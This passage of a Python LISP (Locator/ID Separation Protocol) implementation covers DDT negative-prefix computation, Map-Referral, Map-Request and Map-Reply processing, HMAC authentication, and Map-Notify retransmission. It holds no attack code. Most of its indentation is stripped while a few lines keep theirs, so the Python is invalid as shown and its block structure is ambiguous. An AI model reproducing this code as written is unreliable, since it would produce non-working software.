if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
    # Walk looking for the shortest prefix that does NOT match any configured
    # site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
    # Walk looking for the shortest prefix that does NOT match any configured
    # site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
    # record. Temporarily return the requested prefix until we have
    # lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
    eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
    # to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
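#
# Example (an editor's sketch): for referral-set {A: priority 1 up,
# B: priority 1 up, C: priority 2 up}, the candidate list is [A, B] and the
# node returned is ref_set[hash % 2], so a given (source-EID, dest-EID) pair
# consistently hashes to the same referral-node.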
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
    # If the caller wants us to use the root versus a best-match lookup. We
    # only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received from an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
        # cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Set RLOC to the cached RLOC and set port to gleaned port so we
# can find the RLOC key in lisp_rloc_probe_list.
#
if (mc and mc.gleaned):
rloc = mc.rloc_set[0]
port = rloc.translated_port
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
            # different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
            # Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
        # be behind the same NAT as this ITR. This ITR, however, could be
        # behind another NAT or in public space. We want to mark the
        # private address RLOC unreachable for the two latter cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
                # RTR should not put RTR RLOC in map-cache. But xTRs do. Non-
                # RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None or mc.gleaned == False):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
    if (alg_id == LISP_NONE_ALG_ID): return(True)
    if (alg_id == LISP_SHA_1_96_ALG_ID):
        hashalg = hashlib.sha1
    elif (alg_id == LISP_SHA_256_128_ALG_ID):
        hashalg = hashlib.sha256
    else:
        #
        # Unknown alg-id, don't leave 'hashalg' unbound below.
        #
        lprint("Unsupported authentication alg-id {}".format(alg_id))
        return(None)
    #endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
    # Print differences if the hashes do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
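#
# Illustrative round trip for the two functions above (a sketch only; the
# password "secret" is a hypothetical example value). The registerer fills
# in the authentication field with lisp_compute_auth() and the receiver
# recomputes the hash with lisp_verify_auth() and compares:
#
#   packet = lisp_compute_auth(packet, map_register, "secret")
#   ...
#   good = lisp_verify_auth(packet, map_register.alg_id,
#       map_register.auth_data, "secret")
#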
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
    # Build RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
    map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
    # Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change the Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
